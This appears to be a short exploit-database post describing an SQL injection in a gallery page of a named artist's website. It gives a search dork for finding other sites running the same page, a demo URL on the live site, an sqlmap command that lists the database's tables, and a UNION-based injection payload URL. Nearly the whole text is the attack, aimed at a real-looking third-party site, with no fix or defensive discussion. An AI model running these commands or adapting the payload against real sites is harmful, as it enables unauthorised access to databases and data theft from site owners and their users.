# Exploit Title:Rohana Laing SQL Injection
# Date:17.05.2019
# Dork :intext:" 2019 Rohana Laing"  id=
# Exploit Author:Cerkuday 
# Tested on:Windows &Kali Linux


#Demo

http://www.rohanart.com/gallery.php?ID=51&gallery=5


# Poc:

sqlmap -u "http://www.rohanart.com/gallery.php?ID=50&gallery=5"    --random-agent -D rohanart_rohana --tables

http://www.rohanart.com/gallery.php?ID=50' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x69675657696870575343536d42425341784d5057456a666c44796d7445664e6e666e54674c536265,0x716a7a6a71),NULL,NULL,NULL,NULL,NULL#&gallery=5